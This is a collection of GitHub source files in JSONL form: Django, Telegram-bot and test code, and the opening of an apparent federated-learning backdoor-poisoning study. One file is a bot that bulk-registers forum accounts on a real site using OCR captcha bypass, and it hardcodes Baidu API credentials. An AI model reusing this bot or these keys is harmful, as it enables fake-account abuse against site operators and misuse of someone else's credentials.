+{"seq_id":"3746203650","text":"# -*- coding: utf-8 -*-\nfrom creditor.tests.fixtures.recurring import KeyholderfeeFactory, MembershipfeeFactory, RecurringTransactionFactory\nfrom django.core.management.base import BaseCommand, CommandError\n\n\nclass Command(BaseCommand):\n help = 'generate randomised recurring transactions'\n\n def add_arguments(self, parser):\n parser.add_argument('mode', type=str, choices=('totalrandom', 'membership', 'keyholder'))\n parser.add_argument('amount', type=int)\n\n def handle(self, *args, **options):\n for i in range(options['amount']):\n if options['mode'] == 'totalrandom':\n rt = RecurringTransactionFactory()\n if options['mode'] == 'membership':\n rt = MembershipfeeFactory()\n if options['mode'] == 'keyholder':\n rt = KeyholderfeeFactory()\n if options['verbosity'] > 0:\n print(\"Generated RecurringTransaction %s\" % rt)\n","repo_name":"hacklab-fi/asylum","sub_path":"project/creditor/management/commands/generate_recurring.py","file_name":"generate_recurring.py","file_ext":"py","file_size_in_byte":948,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"78"} +{"seq_id":"6623406064","text":"#读目录下所有文件的第一行,写入另一文件\nimport os\nimport re\npathdir = \"G:\\\\TEST\"\nfiles = os.listdir(pathdir)\nfiles.sort(key = lambda i:int(re.search('(\\d+)',i).group()))\ntitle = \"\"\nline = \"\"\nname = \"\"\nn = 0\nfor file in files:\n all_f = open(\"%s\" %file,\"r\",encoding=\"utf-8\")\n name = file.split(\".\")[0]\n line = all_f.readline()\n n += 1\n title += name + \":\" + line + \"\\n\"\nall_f.close()\nf = open(\"100case_title.txt\" , \"w+\",encoding=\"utf-8\")\nf.write(title)\nf.close()","repo_name":"Suyiwei9527/Python_case_100","sub_path":"Gao/case135.py","file_name":"case135.py","file_ext":"py","file_size_in_byte":494,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} 
+{"seq_id":"37143645850","text":"'''\r\n实现自动注册,验证码识别太低,需要训练\r\n启用图灵本地识别,识别率较高。\r\n'''\r\n\r\n#!/usr/bin/python3\r\n# -*- coding: UTF-8 -*-\r\nimport requests\r\nfrom parsel import Selector\r\nimport ddddocr\r\nfrom datetime import datetime\r\nimport time\r\nimport os\r\nimport base64\r\nfrom time import sleep\r\n\r\n\r\n# 传入文件夹名称\r\ndef tuling_ocr(img_uid):\r\n start = time.time()\r\n # 获取当前路径img文件夹的path\r\n path = os.path.dirname(__file__) + '\\\\' + img_uid\r\n misc_name = path + '\\\\' + 'misc.png'\r\n with open(misc_name, 'rb') as f:\r\n image = base64.b64encode(f.read())\r\n image_base64 = str(image).split('\\'')[1]\r\n try:\r\n url = 'http://127.0.0.1:33333/puxiuyssb?tu=' + image_base64 # 本地接口\r\n # url = 'http://114.116.115.78:33333/puxiuyssb?tu=' + image_base64 # 服务器接口\r\n result = requests.get(url=url)\r\n end = time.time()\r\n print(f\"Running time: {(end - start):.2f} Seconds\")\r\n return result.text\r\n except BaseException as e:\r\n print('接口连接失败')\r\n return '6666'\r\n\r\n# 传入文件夹字符名称,识别本地图片\r\ndef dddd_ocr(img_uid):\r\n print(datetime.now())\r\n start = time.time()\r\n ocr = ddddocr.DdddOcr()\r\n # 获取当前路径img文件夹的path\r\n path = os.path.dirname(__file__) + '\\\\' + img_uid\r\n pic_name = path + '\\\\' + 'misc.png'\r\n with open(pic_name, 'rb') as f:\r\n img_bytes = f.read()\r\n res = ocr.classification(img_bytes)\r\n try:\r\n # 可能识别不出来报错\r\n # 去掉空格\r\n # print(res)\r\n result = str(res).replace(\" \", \"\")\r\n end = time.time()\r\n print(f\"Running time: {(end - start):.2f} Seconds\")\r\n return result\r\n except BaseException as e:\r\n # 出现错误之后需要执行的程序\r\n print(\"验证码无法识别\")\r\n return 'none'\r\n\r\n# 传入文件夹名称\r\ndef baidu_ocr(img_uid):\r\n # img直接传本地图片\r\n print(datetime.now())\r\n start = time.time()\r\n # 获取access_token\r\n # client_id 为官网获取的AK, client_secret 为官网获取的SK\r\n appid = \"25876326\"\r\n client_id = \"54lekuPfz0MAFmXLsFOGZhwS\"\r\n client_secret = \"28FD1UimtkaNhZOk6jwBA08X45s88TyG\"\r\n print(\"appid:\" + appid)\r\n print(\"client_id:\" + client_id)\r\n print(\"client_secret:\" + client_secret)\r\n token_url = \"https://aip.baidubce.com/oauth/2.0/token\"\r\n host = f\"{token_url}?grant_type=client_credentials&client_id={client_id}&client_secret={client_secret}\"\r\n response = requests.get(host)\r\n access_token = response.json().get(\"access_token\")\r\n # 调用通用文字识别高精度版接口\r\n # request_url = \"https://aip.baidubce.com/rest/2.0/ocr/v1/accurate_basic\"\r\n # 网络图片文字识别接口\r\n request_url = \"https://aip.baidubce.com/rest/2.0/ocr/v1/webimage\"\r\n # 以二进制方式打开图文件\r\n # 参数image:图像base64编码\r\n # 下面图片路径请自行切换为自己环境的绝对路径\r\n # 获取当前路径img文件夹的path\r\n path = os.path.dirname(__file__) + '\\\\' + img_uid\r\n pic_name = path + '\\\\' + 'misc.png'\r\n with open(pic_name, \"rb\") as f:\r\n image = base64.b64encode(f.read())\r\n body = {\r\n \"image\": image,\r\n \"language_type\": \"auto_detect\",\r\n \"detect_direction\": \"true\",\r\n \"paragraph\": \"true\",\r\n \"probability\": \"true\",\r\n }\r\n headers = {\"Content-Type\": \"application/x-www-form-urlencoded\"}\r\n request_url = f\"{request_url}?access_token={access_token}\"\r\n response = requests.post(request_url, headers=headers, data=body)\r\n # content = response.content.decode(\"UTF-8\")\r\n # 打印调用结果\r\n res = response.json()\r\n try:\r\n # 可能识别不出来报错\r\n results = res[\"words_result\"][0][\"words\"]\r\n # result = res[\"words_result\"][0][\"words\"]\r\n # 去掉空格\r\n result = str(results).replace(\" \", \"\")\r\n # print(result)\r\n end = time.time()\r\n print(f\"Running time: {(end - start):.2f} Seconds\")\r\n return 
result\r\n except BaseException as e:\r\n # 出现错误之后需要执行的程序\r\n print(\"验证码无法识别\")\r\n return '6'\r\n\r\ndef register():\r\n # 生成用户名列表,逐一注册,成功从列表删除\r\n # items = ['zzz35130', 'zzz35131', 'zzz35132', 'zzz35133', 'zzz35134', 'zzz35135']\r\n items = []\r\n for i in range(632, 1001):\r\n item = 'adsf8650' + str(i)\r\n items.append(item)\r\n\r\n while items:\r\n name = items[0]\r\n print('开始注册---' + name)\r\n # 循环,知道用户名列表为空,报错\r\n session = requests.session()\r\n register_url = 'https://bbs.6994.cn/member.php?mod=register'\r\n post_url = 'https://bbs.6994.cn/member.php?mod=register&inajax=1'\r\n register_header = {\r\n 'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'\r\n }\r\n post_header = {\r\n 'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36',\r\n 'referer': register_url\r\n }\r\n # 第一次访问注册页面,并记录cookies到session\r\n res1 = session.get(url=register_url, headers=register_header)\r\n # 拿到相关表单数据\r\n selector = Selector(res1.text)\r\n formhash = selector.xpath('/html/body/div[8]/div[3]/div[2]/div[1]/form/div[1]/input[2]/@value').extract()[0]\r\n referer = selector.xpath('/html/body/div[8]/div[3]/div[2]/div[1]/form/div[1]/input[3]/@value').extract()[0]\r\n activationauth = selector.xpath('/html/body/div[8]/div[3]/div[2]/div[1]/form/div[1]/input[4]/@value').extract()[0]\r\n seccodehashs = selector.xpath('/html/body/div[8]/div[3]/div[2]/div[1]/form/div[1]/div/div/span/@id').extract()[0]\r\n seccodehash = str(seccodehashs).split('_')[1]\r\n name_zd = selector.xpath('/html/body/div[8]/div[3]/div[2]/div[1]/form/div[1]/div/div/div[1]/table/tr/th/label/@for').extract()[0]\r\n # print(name_zd)\r\n password1_zd = selector.xpath('/html/body/div[8]/div[3]/div[2]/div[1]/form/div[1]/div/div/div[2]/table/tr/th/label/@for').extract()[0]\r\n password2_zd = selector.xpath('/html/body/div[8]/div[3]/div[2]/div[1]/form/div[1]/div/div/div[3]/table/tr/th/label/@for').extract()[0]\r\n post_email_zd = selector.xpath('/html/body/div[8]/div[3]/div[2]/div[1]/form/div[1]/div/div/div[4]/table/tr/th/label/@for').extract()[0]\r\n name = name\r\n password1 = name\r\n password2 = name\r\n post_email = name + '@sina.com'\r\n # 下载验证码图片\r\n misc_url = 'https://bbs.6994.cn/misc.php?mod=seccode&update=81288&idhash=' + seccodehash\r\n res_misc = session.get(url=misc_url, headers=post_header)\r\n # -------------------------下面此处需要加入返回的cookies----------------------\r\n # 将CookieJar转为字典:\r\n cookies11 = requests.utils.dict_from_cookiejar(res_misc.cookies)\r\n # 会话加入cookies\r\n for kk2, vv2 in cookies11.items():\r\n # print(kk, vv)\r\n session.cookies.set(kk2, vv2)\r\n # --------------------------上面此处需要加入返回的cookies---------------------\r\n # 当前目录下创建img文件夹\r\n if os.path.isdir('img'):\r\n pass\r\n else:\r\n print(\"当前目录下不存在 img 文件夹,调用 mkdir 创建该文件夹\")\r\n os.mkdir('img')\r\n path = os.path.dirname(__file__) + '\\\\' + 'img'\r\n pic_name = path + '\\\\' + 'misc.png'\r\n with open(pic_name, 'wb') as f:\r\n f.write(res_misc.content)\r\n print('验证码图片已下载')\r\n # 验证码识别\r\n # misc_str = dddd_ocr('img')\r\n # misc_str = baidu_ocr('img')\r\n misc_str = tuling_ocr('img')\r\n print('验证码是' + misc_str)\r\n post_data = {\r\n 'regsubmit': 'yes',\r\n 'formhash': formhash,\r\n 'referer': referer,\r\n 'activationauth':activationauth,\r\n name_zd: name,\r\n password1_zd: password1,\r\n password2_zd: password2,\r\n post_email_zd: post_email,\r\n 'seccodehash': seccodehash,\r\n 'seccodemodid': 
'member::register',\r\n 'seccodeverify': misc_str\r\n }\r\n # print(post_data)\r\n res2 = session.post(url=post_url, data=post_data, headers=post_header) # 提交post数据\r\n # print(res2.text)\r\n # with open('1.html', 'w', encoding='utf-8') as f:\r\n # f.write(res2.text)\r\n res_num1 = res2.text.find('验证码填写错误')\r\n res_num2 = res2.text.find('地址无效')\r\n res_num3 = res2.text.find('感谢您注册')\r\n res_num4 = res2.text.find('地址已被注册')\r\n # print(res_num)\r\n if res_num1 > 0:\r\n print('验证码填写错误')\r\n elif res_num2 > 0:\r\n print('email地址无效')\r\n elif res_num3 > 0:\r\n print(f'注册成功----------{name}')\r\n # -------注册成功保存cookies------\r\n # 当前目录下创建cookies文件夹\r\n if os.path.isdir('cookies'):\r\n pass\r\n else:\r\n print(\"当前目录下不存在 cookies文件夹,调用 mkdir 创建该文件夹\")\r\n os.mkdir('cookies')\r\n path = os.path.dirname(__file__) + '\\\\' + 'cookies'\r\n cookie_name = path + '\\\\' + f'{name}.txt'\r\n # 写文件\r\n res_home = session.get('https://bbs.6994.cn/', headers=register_header)\r\n # with open('1.html', 'w', encoding='utf-8') as f:\r\n # f.write(res_home.text)\r\n cookies11 = requests.utils.dict_from_cookiejar(session.cookies) # 将CookieJar转为字典:\r\n with open(cookie_name, 'w', encoding='utf-8') as f:\r\n f.write(str(cookies11))\r\n # -------注册成功保存cookies------\r\n items.remove(name)\r\n elif res_num4 > 0:\r\n print(f'已被注册-------{name}')\r\n items.remove(name)\r\n sleep(5)\r\n print('')\r\n session.close()\r\n\r\nif __name__ == '__main__':\r\n register()\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"bluesky2030/python-dome","sub_path":"luobo_register.py","file_name":"luobo_register.py","file_ext":"py","file_size_in_byte":10414,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"28183473610","text":"import pytest\n\nfrom collections import OrderedDict\nfrom itertools import product\nfrom metalearn.components.algorithm_component import AlgorithmComponent\nfrom metalearn.data_types import AlgorithmType, HyperparamType\nfrom sklearn.base import BaseEstimator\n\n\nclass MockEstimator(BaseEstimator):\n\n def __init__(self, hyperparameter1=1, hyperparameter2=\"a\",\n categorical_features=None, continuous_features=None):\n self.hyperparameter1 = hyperparameter1\n self.hyperparameter2 = hyperparameter1\n self.categorical_features = categorical_features\n self.continuous_features = continuous_features\n\n\nclass MockHyperparameter(object):\n\n def __init__(self, name, state_space):\n self.hname = name\n self.state_space = state_space\n\n def get_state_space(self, *args, **kwargs):\n return {\n \"type\": HyperparamType.CATEGORICAL,\n \"choices\": self.state_space,\n }\n\n\nMOCK_HYPERPARAMS = [\n MockHyperparameter(\"hyperparameter1\", [1, 2, 3]),\n MockHyperparameter(\"hyperparameter2\", [\"a\", \"b\", \"c\"])\n]\n\n\ndef _algorithm_component(\n component_type=AlgorithmType.CLASSIFIER,\n initialize_component=None,\n hyperparameters=None,\n exclusion_conditions=None):\n return AlgorithmComponent(\n name=\"TestComponent\",\n component_class=MockEstimator,\n component_type=component_type,\n initialize_component=initialize_component,\n hyperparameters=hyperparameters,\n exclusion_conditions=exclusion_conditions)\n\n\ndef test_init():\n \"\"\"Test happy path initialization and error case.\"\"\"\n algorithm_component = _algorithm_component()\n assert isinstance(algorithm_component, AlgorithmComponent)\n\n with pytest.raises(ValueError):\n _algorithm_component(\"FOOBAR\")\n\n\ndef test_call():\n \"\"\"Test __call__ method correctly instantiates 
the algorithm object.\"\"\"\n algorithm_component = _algorithm_component()\n algorithm_obj = algorithm_component()\n assert isinstance(algorithm_obj, MockEstimator)\n assert hasattr(algorithm_obj, \"hyperparameter1\")\n assert hasattr(algorithm_obj, \"hyperparameter2\")\n\n\ndef test_hyperparameter_name_space():\n \"\"\"Test name space is correctly formatted.\"\"\"\n algorithm_component = _algorithm_component(\n hyperparameters=MOCK_HYPERPARAMS)\n expected = [\n \"TestComponent__hyperparameter1\",\n \"TestComponent__hyperparameter2\"]\n result = algorithm_component.hyperparameter_name_space()\n assert result == expected\n\n algorithm_component_none = _algorithm_component(hyperparameters=None)\n assert algorithm_component_none.hyperparameter_name_space() is None\n\n\ndef test_hyperparameter_state_space():\n \"\"\"Test hyperparameter state space contains correct hyperparameters.\"\"\"\n algorithm_component = _algorithm_component(\n hyperparameters=MOCK_HYPERPARAMS)\n state_space = algorithm_component.hyperparameter_state_space()\n assert (\n state_space[\"TestComponent__hyperparameter1\"][\"choices\"] == [1, 2, 3]\n )\n assert (\n state_space[\"TestComponent__hyperparameter2\"][\"choices\"]\n == [\"a\", \"b\", \"c\"]\n )\n assert _algorithm_component(\n hyperparameters=None).hyperparameter_state_space() == OrderedDict()\n\n\ndef test_hyperparameter_iterator():\n \"\"\"Test that hyperparameter iterator returns all possible combinations.\"\"\"\n algorithm_component = _algorithm_component(\n hyperparameters=MOCK_HYPERPARAMS)\n hyperparam_settings = list(algorithm_component.hyperparameter_iterator())\n hnames = [\n \"TestComponent__hyperparameter1\",\n \"TestComponent__hyperparameter2\"]\n for settings in (dict(zip(hnames, s)) for s in\n product([1, 2, 3], [\"a\", \"b\", \"c\"])):\n assert settings in hyperparam_settings\n\n\ndef test_hyperparameter_exclusion_conditions():\n \"\"\"Test that exclusion conditions correctly render exclusion mask.\"\"\"\n algorithm_component = _algorithm_component(\n hyperparameters=MOCK_HYPERPARAMS,\n # if `1` is chosen on hyperparameter1, then exclude values \"b\", and \"c\"\n # on hyperparameter2\n exclusion_conditions={\n \"hyperparameter1\": {1: {\"hyperparameter2\": [\"b\", \"c\"]}}})\n expected = OrderedDict([\n (\"TestComponent__hyperparameter1\", {\n 1: {\"TestComponent__hyperparameter2\": [\"b\", \"c\"]}})\n ])\n assert algorithm_component.hyperparameter_exclusion_conditions() == \\\n expected\n\n\ndef test_initialize_component():\n \"\"\"Test that initialize component creates estimator with task metadata.\"\"\"\n\n def init_component(\n component_class, categorical_features, continuous_features):\n return component_class(\n categorical_features=categorical_features,\n continuous_features=continuous_features)\n\n algorithm_component = _algorithm_component(\n initialize_component=init_component,\n hyperparameters=MOCK_HYPERPARAMS)\n\n for cat_feat, cont_feat in [\n ([1, 2, 3], [10, 11, 12]),\n ([1, 2, 3], [10, 11, 12]),\n ]:\n estimator = algorithm_component(\n categorical_features=[1, 2, 3],\n continuous_features=[10, 11, 12])\n assert estimator.categorical_features == [1, 2, 3]\n assert estimator.continuous_features == [10, 11, 12]\n\n # case where init_component is None\n algorithm_component = _algorithm_component(\n initialize_component=None,\n hyperparameters=MOCK_HYPERPARAMS)\n\n estimator = algorithm_component(\n categorical_features=[1, 2, 3],\n continuous_features=[10, 11, 12])\n assert estimator.categorical_features is None\n assert 
estimator.continuous_features is None\n\n\ndef test_initialize_component_exceptions():\n \"\"\"Test function signature exceptions of init_component.\"\"\"\n\n algorithm_component = _algorithm_component(\n initialize_component=lambda: None)\n\n # function signature needs to be:\n # (component: Estimator|Transformer,\n # categorical_features: List[int],\n # categorical_features: List[int]) -> Estimator\n for fn in [\n lambda: None,\n lambda x: None,\n lambda x, y: None,\n lambda x, y, z, _: None,\n ]:\n with pytest.raises(TypeError):\n algorithm_component = _algorithm_component(\n initialize_component=fn)\n algorithm_component()\n\n # Test estimator is returned\n for fn in [\n lambda component_class, cat_feats, cont_feats: component_class(\n categorical_features=cat_feats,\n continuous_features=cont_feats),\n lambda component_class, *args: component_class()\n ]:\n\n algorithm_component = _algorithm_component(\n initialize_component=fn)\n assert isinstance(algorithm_component(), BaseEstimator)\n\n # when algorithm component output is not an estimator\n for fn in [\n lambda x, y, z: None,\n lambda x, y, z: \"foobar\",\n lambda x, y, z: 1,\n lambda x, y, z: 0.0511235,\n lambda x, y, z: [],\n lambda x, y, z: {},\n ]:\n with pytest.raises(TypeError):\n algorithm_component = _algorithm_component(\n initialize_component=fn)\n algorithm_component()\n","repo_name":"cosmicBboy/ml-research","sub_path":"metalearn/tests/unit_tests/test_algorithm_component.py","file_name":"test_algorithm_component.py","file_ext":"py","file_size_in_byte":7329,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"78"} +{"seq_id":"42392061810","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom aiogram import types\nfrom aiogram.dispatcher import FSMContext\nfrom aiogram.dispatcher.filters.state import State, StatesGroup\nfrom aiogram.contrib.fsm_storage.memory import MemoryStorage\n\nfrom config import Time, ME\nimport text\nimport keyboard as kb\nfrom misc import dp, bot, db, wfp\nimport datetime\n\n\nclass OrderStates(StatesGroup):\n storage = MemoryStorage()\n get_phone_number = State()\n grind_coffee_pack = State()\n type_of_grind = State()\n set_delivery_spot = State()\n get_address = State()\n get_arriving_time = State()\n\n\nasync def alert_admins(message):\n admins = db.get_admins()\n await bot.send_message(ME, message)\n # for admin in admins:\n # await bot.send_message(admin[0], message)\n\n\nasync def organize_info(user_id, data):\n cart_items = db.get_cart_items(user_id)\n try:\n grind_type = f\"\\nкаву змолоти під {data['grind_type']}\\n\"\n except:\n grind_type = \"\"\n try:\n delivery_address = f\"🚕 доставка на таксі: {data['address']}\"\n except:\n delivery_address = \"📍 забере сам через\"\n try:\n arriving_time = f\"{data['arriving_time']} хв\"\n except:\n arriving_time = \"\"\n user_number = db.get_user_number(user_id)\n ret = wfp.create_ticket(user_id, cart_items, delivery_address)\n formatted_reply = f\"🛍 нове замовлення від: {user_number}\\n📲 id: {user_id}\\n{delivery_address} {arriving_time}\\n\" \\\n f\"📩 номер замовлення: {ret['order_reference']}\\n\\n\"\n price = 0\n for item in cart_items:\n formatted_reply += f\"{item['name']} \\n\"\n price += item['price']\n formatted_reply += grind_type\n formatted_reply += f\"\\n💸 усього на {price} грн.\"\n await bot.send_message(user_id, ret[\"link\"])\n await bot.send_message(user_id, text.WAITING_FOR_PAY, reply_markup=kb.main_kb)\n await alert_admins(message=formatted_reply)\n\n\n@dp.message_handler(lambda 
message: message.text and text.BACK in message.text, state=\"*\")\nasync def back_button_pressed(message: types.Message, state: FSMContext):\n    await state.finish()\n    await bot.send_message(message[\"from\"].id, text.WELCOME_MESSAGE, reply_markup=kb.main_kb)\n\n\n@dp.message_handler(content_types=types.ContentTypes.CONTACT, state=OrderStates.get_phone_number)\nasync def update_phone_number(message: types.Message, state: FSMContext):\n    db.update_phone_number(message[\"from\"].id, message.contact['phone_number'])\n    data = await state.get_data()\n    await organize_info(user_id=message[\"from\"].id, data=data)\n    await state.finish()\n\n\n@dp.message_handler(lambda message: message.text and text.CREATE_ORDER in message.text)\nasync def create_order(message: types.Message):\n    cart_items = db.get_cart_items(message[\"from\"].id)\n\n    def include_coffee_pack() -> bool:\n        for item in cart_items:\n            if item[\"type\"] == \"coffee\":\n                return True\n        return False\n\n    t = datetime.datetime.utcnow().hour + Time.UTC_DIFF\n    if t > Time.CAFE_CLOSES - 1 or t < Time.CAFE_OPENS:\n        await bot.send_message(message[\"from\"].id, text.CAFE_IS_CLOSED, reply_markup=kb.main_kb)\n        return\n\n    if len(cart_items) < 1:\n        await bot.send_message(message[\"from\"].id, text.CART_CANNOT_BE_EMPTY, reply_markup=kb.main_kb)\n        return\n    if include_coffee_pack():\n        await OrderStates.grind_coffee_pack.set()\n        await bot.send_message(message[\"from\"].id, text=text.COFFEE_PACK_IS_IN_MENU, reply_markup=kb.choise_kb)\n    else:\n        await OrderStates.set_delivery_spot.set()\n        await bot.send_message(message[\"from\"].id, text.SET_DELIVERY_SPOT, reply_markup=kb.delivery_spot_kb)\n\n\n@dp.message_handler(content_types=types.ContentTypes.TEXT, state=OrderStates.grind_coffee_pack)\nasync def set_coffee_pack_grind(message: types.Message, state: FSMContext):\n    if message.text == text.YES:\n        await state.update_data(to_grind=text.YES)\n        await OrderStates.type_of_grind.set()\n        await bot.send_message(message[\"from\"].id, text.CHOOSE_GRIND_TYPE, reply_markup=kb.grind_types_kb)\n    elif message.text == text.NO:\n        await OrderStates.set_delivery_spot.set()\n        await state.update_data(to_grind=text.NO)\n        await bot.send_message(message[\"from\"].id, text.SET_DELIVERY_SPOT, reply_markup=kb.delivery_spot_kb)\n    else:\n        return\n\n\n@dp.message_handler(content_types=types.ContentTypes.TEXT, state=OrderStates.type_of_grind)\nasync def set_type_of_grind(message: types.Message, state: FSMContext):\n    if message.text in text.GRIND_TYPES:\n        await state.update_data(grind_type=message.text)\n        await OrderStates.set_delivery_spot.set()\n        await bot.send_message(message[\"from\"].id, text.SET_DELIVERY_SPOT, reply_markup=kb.delivery_spot_kb)\n    else:\n        await bot.send_message(message[\"from\"].id, text.CHOOSE_GRIND_TYPE, reply_markup=kb.grind_types_kb)\n        return\n\n\n@dp.message_handler(content_types=types.ContentTypes.TEXT, state=OrderStates.set_delivery_spot)\n@dp.message_handler(lambda message: message.text and (text.DELIVERY_OLC in message.text or text.DELIVERY_TAXI in message.text))\nasync def set_delivery_spot(message: types.Message, state: FSMContext):\n    if message.text == text.DELIVERY_OLC:\n        await state.update_data(delivery=text.DELIVERY_OLC)\n        await OrderStates.get_arriving_time.set()\n        await bot.send_message(message[\"from\"].id, text.TYPE_ARRIVING_TIME)\n    elif message.text == text.DELIVERY_TAXI:\n        await OrderStates.get_address.set()\n        await bot.send_message(message[\"from\"].id, text.TYPE_DELIVERY_ADDRESS)
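\n\n# Order flow at a glance (a sketch inferred from the handlers in this module; state names follow OrderStates):\n#   create_order -> grind_coffee_pack -> type_of_grind -> set_delivery_spot\n#                -> get_address (taxi) or get_arriving_time (pickup)\n#                -> get_phone_number (only if the user's number is unknown) -> organize_info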
\n\n\n@dp.message_handler(content_types=types.ContentTypes.TEXT, state=OrderStates.get_address)\nasync def get_address(message: types.Message, state: FSMContext):\n    if len(message.text) > 4:\n        await state.update_data(address=message.text.lower())\n    else:\n        await bot.send_message(message[\"from\"].id, text.TYPE_DELIVERY_ADDRESS)\n        return\n    # await bot.send_message(message[\"from\"].id, await state.get_data())\n    if db.get_user_number(message[\"from\"].id) == 0:\n        await OrderStates.get_phone_number.set()\n        await bot.send_message(chat_id=message[\"from\"].id, text=text.SHARE_YOUR_NUMBER, reply_markup=kb.share_phone_kb)\n    else:\n        data = await state.get_data()\n        await organize_info(user_id=message[\"from\"].id, data=data)\n        await state.finish()\n\n\n@dp.message_handler(content_types=types.ContentTypes.TEXT, state=OrderStates.get_arriving_time)\nasync def get_time(message: types.Message, state: FSMContext):\n    def process_time(item: str) -> int:\n        if item.isdigit():\n            return int(item)\n        else:\n            if item[0:2].isdigit():\n                return int(item[0:2])\n            elif item[0:1].isdigit():\n                return int(item[0:1])\n            else:\n                return -1\n\n    time_data = message.text.split(\" \")[0]\n    time = 0\n    if time_data.isdigit():\n        time = int(time_data)\n    else:\n        time = process_time(message.text)\n    if time > 0:  # process_time returns -1 when nothing parseable was found\n        await state.update_data(arriving_time=time)\n    else:\n        await bot.send_message(message[\"from\"].id, text.TYPE_ARRIVING_TIME)\n        return\n    if db.get_user_number(message[\"from\"].id) == 0:\n        await OrderStates.get_phone_number.set()\n        await bot.send_message(chat_id=message[\"from\"].id, text=text.SHARE_YOUR_NUMBER, reply_markup=kb.share_phone_kb)\n    else:\n        data = await state.get_data()\n        await organize_info(user_id=message[\"from\"].id, data=data)\n        await state.finish()\n","repo_name":"riaronc/olc_bot","sub_path":"handlers/order_handlers.py","file_name":"order_handlers.py","file_ext":"py","file_size_in_byte":7717,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"}
+{"seq_id":"40571138879","text":"from typing import List\nimport numpy as np\nimport os\nimport tensorflow as tf\nfrom tensorflow import keras\nfrom tensorflow.keras import layers\nfrom tensorflow.keras.models import Sequential, load_model\nfrom tensorflow.keras.layers import Dense, Dropout, LSTM, Bidirectional\nfrom tensorflow.keras.callbacks import EarlyStopping, ModelCheckpoint\nimport sklearn.metrics.pairwise as smp\nfrom sklearn.metrics import accuracy_score, f1_score, precision_score, classification_report, confusion_matrix\nfrom sklearn.model_selection import train_test_split  # used by sim() below\nfrom fl_ss_data_processing import *\nfrom csv import writer\nimport matplotlib.pyplot as plt\nimport pandas as pd  # used by model_evaluate() below\n#from triangle_sector_similarity import Cosine_Similarity,Euclidean_Distance,TS_SS,Pairwise_TS_SS\nimport math\nimport torch\nimport csv\nfrom itertools import zip_longest\nfrom sklearn import preprocessing\nimport config\nfrom scipy.special import logit, expit\nfrom numpy import errstate\nfrom scipy.stats import norm\nfrom sklearn.metrics import jaccard_score\nfrom keras.optimizers import gradient_descent_v2\n#from keras.layers.core import Dense, Dropout, Flatten\n#from keras.layers.convolutional import Conv2D, MaxPooling2D, SeparableConv2D\n#from tensorflow.python.ops.numpy_ops import np_config\nimport poison_config\n\n\n\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'\n\n\n# This function loads processed data.
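\n# A hypothetical usage sketch (config values as used throughout this module):\n#   splits = load_processed_data('normal.csv', 'abnormal.csv', config.PATH, config.ATTACK,\n#                                 config.DEFENSE, config.LOG_NAME, config.NUM_SYBILS)\n#   x_train, y_train, x_test, y_test = splits[:4]  # clean IDS split; the rest are poisoned variants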
\n# file_path_normal: CSV file with normal traffic\n# file_path_abnormal: CSV file with abnormal traffic\n# returns: train/test features and labels for the clean data plus the backdoor and the four DBA trigger variants (24 arrays)\ndef load_processed_data(file_path_normal,file_path_abnormal,path, attack, defense, log_name,num_sybils=1):\n    data_process = data_processing()\n    timesteps = config.IDS_TIMESTEPS\n    x_train,y_train,x_test,y_test,x_trainP,y_trainP,x_testP,y_testP, x_trainDbaProto, x_testDbaProto, y_trainDbaProto, y_testDbaProto, x_trainDbaPkts, x_testDbaPkts, y_trainDbaPkts, y_testDbaPkts, x_trainDbaDport, x_testDbaDport, y_trainDbaDport, y_testDbaDport, x_trainDbaBytes, x_testDbaBytes, y_trainDbaBytes, y_testDbaBytes = data_process.load_data(file_path_normal,file_path_abnormal,config.PATH, config.ATTACK, config.DEFENSE, config.LOG_NAME,config.NUM_SYBILS, timesteps)\n\n    #print(\"train shape: \", np.shape(x_train))\n    #print(\"test shape: \", np.shape(x_test))\n    #print(\"train label shape: \", y_train.shape)\n    #print(\"test label shape: \", y_test.shape)\n\n    x_train = np.asarray(x_train)\n    x_test = np.nan_to_num(x_test)\n    x_test = np.asarray(x_test)\n    x_trainP = np.asarray(x_trainP)\n    x_testP = np.nan_to_num(x_testP)\n    x_testP = np.asarray(x_testP)\n    x_trainDbaProto = np.asarray(x_trainDbaProto)\n    x_testDbaProto = np.nan_to_num(x_testDbaProto)\n    x_testDbaProto = np.asarray(x_testDbaProto)\n    x_trainDbaPkts = np.asarray(x_trainDbaPkts)\n    x_testDbaPkts = np.nan_to_num(x_testDbaPkts)\n    x_testDbaPkts = np.asarray(x_testDbaPkts)\n    x_trainDbaDport = np.asarray(x_trainDbaDport)\n    x_testDbaDport = np.nan_to_num(x_testDbaDport)\n    x_testDbaDport = np.asarray(x_testDbaDport)\n    x_trainDbaBytes = np.asarray(x_trainDbaBytes)\n    x_testDbaBytes = np.nan_to_num(x_testDbaBytes)\n    x_testDbaBytes = np.asarray(x_testDbaBytes)\n    return x_train,y_train,x_test,y_test,x_trainP,y_trainP,x_testP,y_testP, x_trainDbaProto, x_testDbaProto, y_trainDbaProto, y_testDbaProto, x_trainDbaPkts, x_testDbaPkts, y_trainDbaPkts, y_testDbaPkts, x_trainDbaDport, x_testDbaDport, y_trainDbaDport, y_testDbaDport, x_trainDbaBytes, x_testDbaBytes, y_trainDbaBytes, y_testDbaBytes\n\n\n''' create_clients shards the training data into one slice per federated client.\n    args:\n        x_train: training examples\n        y_train: binarized labels for each example\n        num_clients: number of federated members (clients)\n        initial: the clients' name prefix, e.g. clients_1\n\n    return: a dictionary keyed by client name whose values are\n                data shards - a [features, labels] pair.\n\n'''\ndef create_clients(path, attack, num_sybils, defense, log_name, x_train, y_train, num_clients=10, initial='clients'):\n    print(\"Create Clients: {}\\n\".format(num_clients))\n    with open(path + attack +'_'+ 